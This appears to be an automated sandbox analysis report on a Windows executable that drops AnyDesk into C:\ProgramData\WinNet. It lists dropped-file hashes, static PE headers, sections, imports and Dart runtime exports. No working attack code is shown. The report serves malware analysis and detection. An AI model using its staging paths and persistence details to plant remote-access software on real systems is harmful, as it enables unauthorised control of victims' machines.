                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:PW6L4Cd7HcigAxjfHYnOdDxnoux74ON0P3IG6n25/2wGqcN6iIF090xQy68:e6LHrcmuuWO3G62F2NN6HF097r8
                                                                                                                                                                                                                                                MD5:0E856F7CADDD59EE117BD3D6A2487ED1
                                                                                                                                                                                                                                                SHA1:4CD92A14BC83E212233E8448FDB16E660DADC186
                                                                                                                                                                                                                                                SHA-256:FC3962B90A6FF6FC3F1BB8113AE844117957462AD8111FFD1898715F806EE360
                                                                                                                                                                                                                                                SHA-512:6E3919BD44250CC9FD4A9BC931E669B296A88CD9940E82069CCBCD86FCD406FC768265B5C6A825000A5FA993DDB1D41EED345CE4F4C263B73EEC8A1BF0B7B9CE
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:ad.account.auth_methods=6fa74c609a01f31f1f670668df954f4642a4aae8018a18dae3abc51f167a31f28ab2e632388f2b710ff648310f1fa2df0b53d2e90e4e008262013ecaea9230e50937c559d3f575c38fb28a38d42b45e475d0d388488672b4d21d81d06ecfc27374ab0862b47b212f41cf5778b89ce45a87747d28cd0ac7c8032f57dd545c574a12d06473eb8c8c9fb8826942204f5470f0d9a3817dc74128fc7ba66ae4d3b1b09852806804e95e3a755738cb595b592b2c508a40824a8eafea4719d6c70fa5d90bb19d7a062d1bea1e3319e4edde39b5883afb3e7703df602ad102557a7479f42b183e4225af.ad.account.info=6fa74c609a01f31f1f670668df954f4642a4aae8018a18dae3abc51f167a31f28ab2e632388f2b710ff648310f1fa2df0b53d2e90e4e008262013ecaea92ad691ed00f3bf19a56192f20c2c74cb4fca1d7db9de9bdd4c9bd38c4598c0e3ac27374ab0862b47b212f41cf5778b89c630f995842bc6ed8d3ab8b5dd9d788ba06a5498b760bfa73f66a8a96ccebe20e6470f0d9aa6ff84a3800745405cf99fd2b5af963435ccb7c546719a1bb065b19c8113c2811cc97f08445e6af22e356429d42ed394f9aadae22a13f5d201d2bdea0d856f066c6b4f58c0598c199e7ae3973bb7423fc2521a605da6b013d6535496d9535cea9f64cba.ad.acc

                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\75fdacd8330bac18.customDestinations-ms (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\ProgramData\WinNet\AnyDesk.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3490
                                                                                                                                                                                                                                                Entropy (8bit):3.222604744442915
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:aLRi5ocAETmN7js0RXERYWoym5LRi5ocAEan9js0RXE+jDym+:MRKobETejsyoNoy2RKobEY9jsyry1
                                                                                                                                                                                                                                                MD5:B77E34467DB722A5CC54172DB45D1FD0
                                                                                                                                                                                                                                                SHA1:DFCD23CDCE7A057C32A36860EF599617C485AC67
                                                                                                                                                                                                                                                SHA-256:2A8612A46857BBEC9B0CEEF0FB00F60398B74497FED798378B7BED9132CBC9AE
                                                                                                                                                                                                                                                SHA-512:90C923DFC29CC277C4542369A4677A0682C1D0898AFC3F155BF8F38C3182AD75A1A4B558CEE121FF4FDBEBA060E683801F41B1384BF0CDF8D6AA7AB86AD33C2A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:...................................FL..................F.@.. ...Z..fm...,L.fm...Z..fm..H.O.....................E....P.O. .:i.....+00.../C:\...................`.1.....cX.c. PROGRA~3..H......O.IcX.c....g......................` .P.r.o.g.r.a.m.D.a.t.a.....T.1.....cX.c. WinNet..>......cX.ccX.c..........................+X..W.i.n.N.e.t.....b.2.H.O.cX.c AnyDesk.exe.H......cX.ccX.c....i.....................+X..A.n.y.D.e.s.k...e.x.e.......P...............-.......O............w_0.....C:\ProgramData\WinNet\AnyDesk.exe....O.p.e.n. .a. .n.e.w. .A.n.y.D.e.s.k. .w.i.n.d.o.w...!.C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.W.i.n.N.e.t.\.A.n.y.D.e.s.k...e.x.e.........%ALLUSERSPROFILE%\WinNet\AnyDesk.exe................................................................................................................................................................................................................................%.A.L.L.U.S.E.R.S.P.R.O.F.I.L.E.%.\.W.i.n.N.e.t.\.A.n.y.D.e.s.k...e.x.e....................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OQU1SYBPAW9RJS7HV8YK.temp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\ProgramData\WinNet\AnyDesk.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3490
                                                                                                                                                                                                                                                Entropy (8bit):3.222604744442915
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:aLRi5ocAETmN7js0RXERYWoym5LRi5ocAEan9js0RXE+jDym+:MRKobETejsyoNoy2RKobEY9jsyry1
                                                                                                                                                                                                                                                MD5:B77E34467DB722A5CC54172DB45D1FD0
                                                                                                                                                                                                                                                SHA1:DFCD23CDCE7A057C32A36860EF599617C485AC67
                                                                                                                                                                                                                                                SHA-256:2A8612A46857BBEC9B0CEEF0FB00F60398B74497FED798378B7BED9132CBC9AE
                                                                                                                                                                                                                                                SHA-512:90C923DFC29CC277C4542369A4677A0682C1D0898AFC3F155BF8F38C3182AD75A1A4B558CEE121FF4FDBEBA060E683801F41B1384BF0CDF8D6AA7AB86AD33C2A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:...................................FL..................F.@.. ...Z..fm...,L.fm...Z..fm..H.O.....................E....P.O. .:i.....+00.../C:\...................`.1.....cX.c. PROGRA~3..H......O.IcX.c....g......................` .P.r.o.g.r.a.m.D.a.t.a.....T.1.....cX.c. WinNet..>......cX.ccX.c..........................+X..W.i.n.N.e.t.....b.2.H.O.cX.c AnyDesk.exe.H......cX.ccX.c....i.....................+X..A.n.y.D.e.s.k...e.x.e.......P...............-.......O............w_0.....C:\ProgramData\WinNet\AnyDesk.exe....O.p.e.n. .a. .n.e.w. .A.n.y.D.e.s.k. .w.i.n.d.o.w...!.C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.W.i.n.N.e.t.\.A.n.y.D.e.s.k...e.x.e.........%ALLUSERSPROFILE%\WinNet\AnyDesk.exe................................................................................................................................................................................................................................%.A.L.L.U.S.E.R.S.P.R.O.F.I.L.E.%.\.W.i.n.N.e.t.\.A.n.y.D.e.s.k...e.x.e....................

                                                                                                                                                                                                                                                Static File Info

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                Entropy (8bit):6.397360951799639
                                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                                • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                                                                • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                File name:SysrI6zSkJ.exe
                                                                                                                                                                                                                                                File size:21'906'944 bytes
                                                                                                                                                                                                                                                MD5:2e501240ec8b9aab46d76a6504e44882
                                                                                                                                                                                                                                                SHA1:1a97d7662e66502faa5a7718565bb362eb6f27bd
                                                                                                                                                                                                                                                SHA256:582cf0470ba0d2c2ef2c3fee83442db0e345656f7d7c46ee5b613998fdd6ee00
                                                                                                                                                                                                                                                SHA512:eae4aacbfcee43ad8f9b2acbddb1b3b71c2aec0064bc6605107eb8b254614361c77984d09e7eabb91fc26634822ac448d8be884dd8f174021c52979690c2f97b
                                                                                                                                                                                                                                                SSDEEP:98304:Kj1ZAxOCU3yUetDvB6ti3FOU8jRdqY9d2omTt20+NVZ:mAxOCU3yUetDvB6ti1aOTtlcVZ
                                                                                                                                                                                                                                                TLSH:C527D03287433CF9D86C5936D0262E155E78368BCB25A1CFEBC424772FAEDC48D29661
                                                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a(J(%I${%I${%I${.9'z=I${.9!z.I${C&.{,I${w<!zvI${w< z6I${w<'z)I${.9 z.I${.9%z>I${%I%{)H${%I${AM${.<$z$I${.<.{$I${.<&z$I${Rich%I$

                                                                                                                                                                                                                                                File Icon

                                                                                                                                                                                                                                                Icon Hash:1765839997876d37

                                                                                                                                                                                                                                                Static PE Info

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Entrypoint:0x1402634e4
                                                                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                Time Stamp:0x65C29ABB [Tue Feb 6 20:46:51 2024 UTC]
                                                                                                                                                                                                                                                TLS Callbacks:0x4018cd80, 0x1, 0x4009cf00, 0x1
                                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                                OS Version Major:5
                                                                                                                                                                                                                                                OS Version Minor:2
                                                                                                                                                                                                                                                File Version Major:5
                                                                                                                                                                                                                                                File Version Minor:2
                                                                                                                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                                                                                                                Subsystem Version Minor:2
                                                                                                                                                                                                                                                Import Hash:9576feaee7c50f81d281a6149bed248d

                                                                                                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                sub esp, 28h
                                                                                                                                                                                                                                                call 00007FA25CEF6F18h
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                add esp, 28h
                                                                                                                                                                                                                                                jmp 00007FA25CEF6577h
                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                inc eax
                                                                                                                                                                                                                                                push ebx
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                sub esp, 20h
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                mov ebx, ecx
                                                                                                                                                                                                                                                xor ecx, ecx
                                                                                                                                                                                                                                                call dword ptr [0003AD3Fh]
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                mov ecx, ebx
                                                                                                                                                                                                                                                call dword ptr [0003B04Eh]
                                                                                                                                                                                                                                                call dword ptr [0003ADB0h]
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                mov ecx, eax
                                                                                                                                                                                                                                                mov edx, C0000409h
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                add esp, 20h
                                                                                                                                                                                                                                                pop ebx
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                jmp dword ptr [0003AD8Ch]
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                mov dword ptr [esp+08h], ecx
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                sub esp, 38h
                                                                                                                                                                                                                                                mov ecx, 00000017h
                                                                                                                                                                                                                                                call dword ptr [0003B028h]
                                                                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                                                                je 00007FA25CEF6709h
                                                                                                                                                                                                                                                mov ecx, 00000002h
                                                                                                                                                                                                                                                int 29h
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                lea ecx, dword ptr [0014B62Eh]
                                                                                                                                                                                                                                                call 00007FA25CEF68CEh
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                mov eax, dword ptr [esp+38h]
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                mov dword ptr [0014B715h], eax
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                lea eax, dword ptr [esp+38h]
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                add eax, 08h
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                mov dword ptr [0014B6A5h], eax
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                mov eax, dword ptr [0014B6FEh]
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                mov dword ptr [0014B56Fh], eax
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                mov eax, dword ptr [esp+40h]
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                mov dword ptr [0014B673h], eax
                                                                                                                                                                                                                                                mov dword ptr [0014B549h], C0000409h
                                                                                                                                                                                                                                                mov dword ptr [0014B543h], 00000001h
                                                                                                                                                                                                                                                mov dword ptr [0014B54Dh], 00000001h

                                                                                                                                                                                                                                                Data Directories

                                                                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x39f1000x26d8.rdata
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x3a17d80x118.rdata
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x3c70000x10ab5.rsrc
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x3b10000x147a8.pdata
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x3d80000xa0e8.reloc
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x398a180x54.rdata
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x398c000x28.rdata
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x398a700x138.rdata
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x29e0000x790.rdata
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                Sections

                                                                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                .text0x10000x29ce340x29d000540077970aa66d75d4e97e3a6080936cunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                .rdata0x29e0000x1050ee0x105200ec7e77069345beb6fd4280abff24481eFalse0.3736228084609861data6.1960997863784755IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                .data0x3a40000xc21c0x42008224b3809e97cfd4c4ab01b6d66b1871False0.181640625data3.794800668027772IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                .pdata0x3b10000x147a80x14800211a9e14a91d5aed26341c803e945f7aFalse0.4945931783536585data6.021656628421719IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                _RDATA0x3c60000xfc0x200e6b9c002c7370fb9390f6d78a24e5375False0.326171875data2.4706336560932725IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                .rsrc0x3c70000x10ab50x10c0088f1cf54e2672a8cf3b7a789982939fcFalse0.08477145522388059data3.699073812667143IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                .reloc0x3d80000xa0e80xa20031614008b9578caeea7592d554cef0f2False0.15048707561728394data5.449275206873749IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                snapshot0x3e30000x110e4c00x110e600828acc69034bc21f6c78e11157c4ef6eunknownunknownunknownunknownIMAGE_SCN_MEM_DISCARDABLE

                                                                                                                                                                                                                                                Resources

                                                                                                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                RT_ICON0x3c70fc0x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.08026736070034307
                                                                                                                                                                                                                                                RT_GROUP_ICON0x3d79240x14data1.15
                                                                                                                                                                                                                                                RT_MANIFEST0x3d79380x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                                                                                                                                                                                                Imports

                                                                                                                                                                                                                                                DLLImport
                                                                                                                                                                                                                                                ole32.dllCoTaskMemFree, CoTaskMemAlloc
                                                                                                                                                                                                                                                IPHLPAPI.DLLGetAdaptersAddresses
                                                                                                                                                                                                                                                PSAPI.DLLGetProcessMemoryInfo, EnumProcessModules
                                                                                                                                                                                                                                                WS2_32.dllsocket, WSARecv, WSASend, getsockopt, WSAGetLastError, WSASetLastError, WSAIoctl, closesocket, setsockopt, send, recv, ioctlsocket, connect, WSASocketW, listen, bind, WSASendTo, InetNtopW, InetPtonW, getnameinfo, freeaddrinfo, getaddrinfo, getpeername, getsockname, WSAStartup, WSAAddressToStringW, ntohs, htons, gethostname, WSARecvFrom, shutdown
                                                                                                                                                                                                                                                RPCRT4.dllUuidCreateSequential, UuidToStringW, RpcStringFreeW
                                                                                                                                                                                                                                                SHLWAPI.dllUrlIsW, PathCreateFromUrlW
                                                                                                                                                                                                                                                ADVAPI32.dllRegGetValueW
                                                                                                                                                                                                                                                SHELL32.dllCommandLineToArgvW
                                                                                                                                                                                                                                                dbghelp.dllSymCleanup, SymInitialize, SymSetOptions
                                                                                                                                                                                                                                                bcrypt.dllBCryptGenRandom
                                                                                                                                                                                                                                                CRYPT32.dllCertEnumCertificatesInStore, CertFreeCertificateContext, CertCloseStore, CertOpenStore
                                                                                                                                                                                                                                                KERNEL32.dllGetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, LCMapStringW, CompareStringW, HeapAlloc, HeapFree, GetCommandLineA, GetModuleHandleExW, FreeLibraryAndExitThread, ExitThread, CreateThread, SystemTimeToFileTime, TzSpecificLocalTimeToSystemTime, CreatePipe, DuplicateHandle, EnumSystemLocalesW, GetDriveTypeW, ReadConsoleW, RaiseException, GetCPInfo, GetStringTypeW, LCMapStringEx, DecodePointer, EncodePointer, FindFirstFileExW, IsValidCodePage, GetACP, GetOEMCP, SetEnvironmentVariableW, GetProcessHeap, HeapReAlloc, GetFileSizeEx, WriteConsoleW, PeekNamedPipe, GetTempPathW, InitOnceExecuteOnce, SetConsoleCtrlHandler, GetConsoleOutputCP, GetConsoleCP, SetConsoleOutputCP, SetConsoleCP, GetStdHandle, GetConsoleMode, SetConsoleMode, MultiByteToWideChar, CreateFileW, SetStdHandle, CreateIoCompletionPort, CancelIoEx, CloseHandle, WaitForSingleObject, OpenThread, GetFileType, ReadFile, PostQueuedCompletionStatus, GetLastError, WriteFile, SetLastError, ReadDirectoryChangesW, GetQueuedCompletionStatus, GetCurrentDirectoryW, SetCurrentDirectoryW, SetErrorMode, SetUnhandledExceptionFilter, GetSystemInfo, GetUserDefaultLocaleName, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetModuleFileNameW, WideCharToMultiByte, ExitProcess, GetModuleHandleW, GetProcAddress, CreateProcessW, CreateEventW, WaitForMultipleObjects, OpenProcess, TerminateProcess, GetCurrentProcessId, GetCurrentProcess, CreateNamedPipeW, RegisterWaitForSingleObject, UnregisterWait, GetExitCodeProcess, GetConsoleScreenBufferInfo, LoadLibraryExW, FreeLibrary, LoadLibraryW, FormatMessageA, LocalFree, VirtualAlloc, VirtualFree, VirtualProtect, InitializeSRWLock, AcquireSRWLockShared, AcquireSRWLockExclusive, ReleaseSRWLockShared, ReleaseSRWLockExclusive, TlsGetValue, TlsAlloc, TlsSetValue, FindNextFileW, FindFirstFileW, GetFileInformationByHandle, FindClose, GetFileAttributesW, CreateDirectoryW, HeapSize, RemoveDirectoryW, MoveFileExW, DeleteFileW, SetFileAttributesW, SetFilePointerEx, SetEndOfFile, FlushFileBuffers, LockFileEx, UnlockFileEx, GetFullPathNameW, CreateSymbolicLinkW, CopyFileExW, MoveFileW, DeviceIoControl, SetFileTime, GetFinalPathNameByHandleW, GetCurrentThreadId, TryAcquireSRWLockExclusive, InitializeCriticalSection, InitializeConditionVariable, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, SleepConditionVariableCS, WakeConditionVariable, WakeAllConditionVariable, FormatMessageW, GetCommandLineW, QueryPerformanceFrequency, QueryPerformanceCounter, GetSystemTimeAsFileTime, Sleep, GetCurrentThread, SetThreadPriority, TlsFree, VirtualQuery, SleepConditionVariableSRW, GetTimeZoneInformation, FileTimeToSystemTime, GetTimeZoneInformationForYear, SystemTimeToTzSpecificLocalTime, GetLocaleInfoEx, CreateFileA, CreateFileMappingW, MapViewOfFile, UnmapViewOfFile, InitializeCriticalSectionAndSpinCount, SetEvent, ResetEvent, WaitForSingleObjectEx, InitializeSListHead, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, InitOnceBeginInitialize, InitializeCriticalSectionEx, TryEnterCriticalSection, InitOnceComplete, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree
                                                                                                                                                                                                                                                ntdll.dllRtlUnwindEx, RtlUnwind, RtlPcToFileHeader

                                                                                                                                                                                                                                                Exports

                                                                                                                                                                                                                                                NameOrdinalAddress
                                                                                                                                                                                                                                                Dart_AddSymbols10x140242a30
                                                                                                                                                                                                                                                Dart_Allocate20x140256d60
                                                                                                                                                                                                                                                Dart_AllocateWithNativeFields30x140257380
                                                                                                                                                                                                                                                Dart_BooleanValue40x14024ccb0
                                                                                                                                                                                                                                                Dart_ClassLibrary50x14024a640
                                                                                                                                                                                                                                                Dart_ClassName60x140249860
                                                                                                                                                                                                                                                Dart_Cleanup70x140241430
                                                                                                                                                                                                                                                Dart_CloseNativePort80x140262630
                                                                                                                                                                                                                                                Dart_ClosureFunction90x14024a2d0
                                                                                                                                                                                                                                                Dart_CompileAll100x140262700
                                                                                                                                                                                                                                                Dart_CompileToKernel110x140260ca0
                                                                                                                                                                                                                                                Dart_CopyUTF8EncodingOfString120x14024ed90
                                                                                                                                                                                                                                                Dart_CreateAppAOTSnapshotAsAssemblies130x140260e20
                                                                                                                                                                                                                                                Dart_CreateAppAOTSnapshotAsAssembly140x140260e20
                                                                                                                                                                                                                                                Dart_CreateAppAOTSnapshotAsElf150x140260e00
                                                                                                                                                                                                                                                Dart_CreateAppAOTSnapshotAsElfs160x140260e00
                                                                                                                                                                                                                                                Dart_CreateAppJITSnapshotAsBlobs170x140260e40
                                                                                                                                                                                                                                                Dart_CreateCoreJITSnapshotAsBlobs180x140260e40
                                                                                                                                                                                                                                                Dart_CreateIsolateGroup190x140241ae0
                                                                                                                                                                                                                                                Dart_CreateIsolateGroupFromKernel200x140241c70
                                                                                                                                                                                                                                                Dart_CreateIsolateInGroup210x140241e40
                                                                                                                                                                                                                                                Dart_CreateSnapshot220x140243770
                                                                                                                                                                                                                                                Dart_CreateVMAOTSnapshotAsAssembly230x140260e20
                                                                                                                                                                                                                                                Dart_CurrentIsolate240x1402421b0
                                                                                                                                                                                                                                                Dart_CurrentIsolateData250x1402421e0
                                                                                                                                                                                                                                                Dart_CurrentIsolateGroup260x1402422f0
                                                                                                                                                                                                                                                Dart_CurrentIsolateGroupData270x140242320
                                                                                                                                                                                                                                                Dart_CurrentIsolateGroupId280x1402423b0
                                                                                                                                                                                                                                                Dart_DebugName290x1402424c0
                                                                                                                                                                                                                                                Dart_DebugNameToCString300x140242780
                                                                                                                                                                                                                                                Dart_DefaultCanonicalizeUrl310x14025c630
                                                                                                                                                                                                                                                Dart_DeferredLoadComplete320x14025f850
                                                                                                                                                                                                                                                Dart_DeferredLoadCompleteError330x14025fc80
                                                                                                                                                                                                                                                Dart_DeleteFinalizableHandle340x140241160
                                                                                                                                                                                                                                                Dart_DeletePersistentHandle350x140240d70
                                                                                                                                                                                                                                                Dart_DeleteWeakPersistentHandle360x140240f60
                                                                                                                                                                                                                                                Dart_DetectNullSafety370x140260d20
                                                                                                                                                                                                                                                Dart_DisableHeapSampling380x140004e80
                                                                                                                                                                                                                                                Dart_DoubleValue390x14024c340
                                                                                                                                                                                                                                                Dart_DumpNativeStackTrace400x140004e80
                                                                                                                                                                                                                                                Dart_EmptyString410x140245ae0
                                                                                                                                                                                                                                                Dart_EnableHeapSampling420x140004e80
                                                                                                                                                                                                                                                Dart_EnterIsolate430x1402428e0
                                                                                                                                                                                                                                                Dart_EnterScope440x140245570
                                                                                                                                                                                                                                                Dart_ErrorGetException450x14023e840
                                                                                                                                                                                                                                                Dart_ErrorGetStackTrace460x14023eb30
                                                                                                                                                                                                                                                Dart_ErrorHasException470x14023e640
                                                                                                                                                                                                                                                Dart_ExecuteInternalCommand480x140262760
                                                                                                                                                                                                                                                Dart_ExitIsolate490x140243690
                                                                                                                                                                                                                                                Dart_ExitScope500x1402456f0
                                                                                                                                                                                                                                                Dart_False510x14024cc00
                                                                                                                                                                                                                                                Dart_FinalizeAllClasses520x140262730
                                                                                                                                                                                                                                                Dart_FinalizeLoading530x14025f5d0
                                                                                                                                                                                                                                                Dart_FunctionIsStatic540x140249ff0
                                                                                                                                                                                                                                                Dart_FunctionName550x1402494f0
                                                                                                                                                                                                                                                Dart_FunctionOwner560x140249c10
                                                                                                                                                                                                                                                Dart_GetClass570x14025d0a0
                                                                                                                                                                                                                                                Dart_GetCurrentUserTag580x140260e90
                                                                                                                                                                                                                                                Dart_GetDataFromByteBuffer590x140255f20
                                                                                                                                                                                                                                                Dart_GetDefaultUserTag600x140261120
                                                                                                                                                                                                                                                Dart_GetError610x14023e320
                                                                                                                                                                                                                                                Dart_GetField620x140258b90
                                                                                                                                                                                                                                                Dart_GetLoadedLibraries630x14025eb40
                                                                                                                                                                                                                                                Dart_GetMainPortId640x1402454d0
                                                                                                                                                                                                                                                Dart_GetMessageNotifyCallback650x140243a10
                                                                                                                                                                                                                                                Dart_GetNativeArgument660x14025b0d0
                                                                                                                                                                                                                                                Dart_GetNativeArgumentCount670x14025b3e0
                                                                                                                                                                                                                                                Dart_GetNativeArguments680x14025a7e0
                                                                                                                                                                                                                                                Dart_GetNativeBooleanArgument690x14025b820
                                                                                                                                                                                                                                                Dart_GetNativeDoubleArgument700x14025b8b0
                                                                                                                                                                                                                                                Dart_GetNativeFieldsOfArgument710x14025b400
                                                                                                                                                                                                                                                Dart_GetNativeInstanceField720x14025a170
                                                                                                                                                                                                                                                Dart_GetNativeInstanceFieldCount730x140259ea0
                                                                                                                                                                                                                                                Dart_GetNativeIntegerArgument740x14025b790
                                                                                                                                                                                                                                                Dart_GetNativeIsolateGroupData750x14025a7c0
                                                                                                                                                                                                                                                Dart_GetNativeReceiver760x14025b490
                                                                                                                                                                                                                                                Dart_GetNativeResolver770x14025ff70
                                                                                                                                                                                                                                                Dart_GetNativeStringArgument780x14025b610
                                                                                                                                                                                                                                                Dart_GetNativeSymbol790x140260250
                                                                                                                                                                                                                                                Dart_GetNonNullableType800x14025ddb0
                                                                                                                                                                                                                                                Dart_GetNullableType810x14025dd90
                                                                                                                                                                                                                                                Dart_GetObfuscationMap820x140260e60
                                                                                                                                                                                                                                                Dart_GetPeer830x1402607e0
                                                                                                                                                                                                                                                Dart_GetStaticMethodClosure840x14024c600
                                                                                                                                                                                                                                                Dart_GetStickyError850x140242f50
                                                                                                                                                                                                                                                Dart_GetType860x14025d5f0
                                                                                                                                                                                                                                                Dart_GetTypeOfExternalTypedData870x140254110
                                                                                                                                                                                                                                                Dart_GetTypeOfTypedData880x140253f50
                                                                                                                                                                                                                                                Dart_GetUserTagLabel890x1402619f0
                                                                                                                                                                                                                                                Dart_HandleFromPersistent900x14023ff70
                                                                                                                                                                                                                                                Dart_HandleFromWeakPersistent910x1402401b0
                                                                                                                                                                                                                                                Dart_HandleMessage920x1402442b0
                                                                                                                                                                                                                                                Dart_HandleServiceMessages930x140011c20
                                                                                                                                                                                                                                                Dart_HasLivePorts940x140244c70
                                                                                                                                                                                                                                                Dart_HasServiceMessages950x1400014c0
                                                                                                                                                                                                                                                Dart_HasStickyError960x140242eb0
                                                                                                                                                                                                                                                Dart_IdentityEquals970x14023fd30
                                                                                                                                                                                                                                                Dart_Initialize980x140241400
                                                                                                                                                                                                                                                Dart_InstanceGetType990x140249160
                                                                                                                                                                                                                                                Dart_IntegerFitsIntoInt641000x14024a960
                                                                                                                                                                                                                                                Dart_IntegerFitsIntoUint641010x14024ac10
                                                                                                                                                                                                                                                Dart_IntegerToHexCString1020x14024bd90
